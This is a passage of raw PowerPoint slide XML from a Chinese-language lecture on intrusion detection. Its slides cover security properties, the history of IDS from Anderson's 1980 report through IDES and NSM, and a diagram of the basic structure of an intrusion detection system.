            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可用性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Availability）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可控性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Controllability）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14355734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DD6E4371-ED72-404A-960A-87FA74574DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的起源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101379" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A7322B-0079-4B94-B75F-7BBEBD303DBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2209800"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1980</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>James P. Anderson :《Computer Security Threat Monitoring and Surveillance》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>（计算机安全威胁监控与监视）的技术报告，第一次详细阐述了入侵检测的概念</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>他提出了一种对计算机系统风险和威胁的分类方法，并将威胁分为外部渗透、内部渗透和不法行为三种</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>还提出了利用审计跟踪数据监视入侵活动的思想。这份报告被公认为是入侵检测的开山之作</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38D2FE3C-6B0B-47F0-A113-30E84BEB06BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的起源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E239154F-81BB-4ABA-9369-166A19968BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2133600"/>
            <a:ext cx="8382000" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>年到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>1986</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>年，乔治敦大学的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>Dorothy Denning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>SRI/CSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>Peter Neumann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>研究出了一个实时入侵检测系统模型，取名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>IDES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（入侵检测专家系统）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102404" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CBFD72A-CE00-4A11-88EC-B2CA4672BB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3074988" y="3284538"/>
            <a:ext cx="3024187" cy="471487"/>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800" b="1"/>
              <a:t>审计数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102405" name="直接箭头连接符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409E12FA-3089-4ABD-A67F-E2500CE6865D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2930525" y="4862513"/>
            <a:ext cx="0" cy="1068387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">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102406" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828E5652-A90D-4E44-AD49-A8103E9725FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1570038" y="4352925"/>
            <a:ext cx="3024187" cy="471488"/>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800" b="1"/>
              <a:t>模式匹配器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102407" name="直接箭头连接符 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9581B61-14C5-4A6F-ACFD-21AB49A8D48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4830763" y="3756025"/>
            <a:ext cx="1484312" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">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2408" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20530E3C-6B9B-4FDE-8661-4EAA1BE7317E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5018088" y="4368800"/>
            <a:ext cx="3025775" cy="471488"/>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800" b="1"/>
              <a:t>轮廓特征引擎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102409" name="直接箭头连接符 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F0C7050-BCF7-47D8-9447-23F54363FC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3189288" y="3792538"/>
            <a:ext cx="1512887" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">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2410" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA0078E-CF4E-4A45-B3F5-52694E2D1CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="5905500"/>
            <a:ext cx="3024188" cy="469900"/>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800" b="1"/>
              <a:t>策略规则</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102411" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC83633-64C6-467E-B29D-49265AA6C5EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5018088" y="5383213"/>
            <a:ext cx="3025775" cy="469900"/>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800" b="1"/>
              <a:t>策略规则</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102412" name="直接箭头连接符 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E809BC6-4F31-4C8F-95E3-57831B7EF881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="102411" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6530975" y="4824413"/>
            <a:ext cx="11113" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">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02413" name="直接箭头连接符 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192BB0B0-FCE5-4E3D-9889-8332F2FA2306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6315075" y="5870575"/>
            <a:ext cx="395288" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">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02414" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0A437B-A44D-4EDE-A23B-68C40F2A9913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4830763" y="6327775"/>
            <a:ext cx="3024187" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">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zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>警告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>报告产生器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102415" name="直接箭头连接符 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51AA807-0BCF-43BB-963F-8483F54ED508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3236913" y="4886325"/>
            <a:ext cx="1793875" cy="1423988"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxn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95053197-8A47-422B-8325-DE3C7E5B14A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的起源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1FC138-5C8A-4578-BB3D-34B3299EF3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2209800"/>
            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>，加州大学戴维斯分校的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>L. T. Heberlein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>等人开发出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>NSM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>Network Security Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>该系统第一次直接将网络流作为审计数据来源，因而可以在不将审计数据转换成统一格式的情况下监控异种主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>入侵检测系统发展史翻开了新的一页，两大阵营正式形成：基于网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>和基于主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>IDS </a:t>
            </a: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AE6BCDD3-DD2A-4A25-863E-06F8A99FC7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基本结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0203C44D-AB9B-43DC-8FC7-50A7155D8DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测是监测计算机网络和系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>以发现违反安全策略事件的过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>简单地说，入侵检测系统包括三个功能部件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
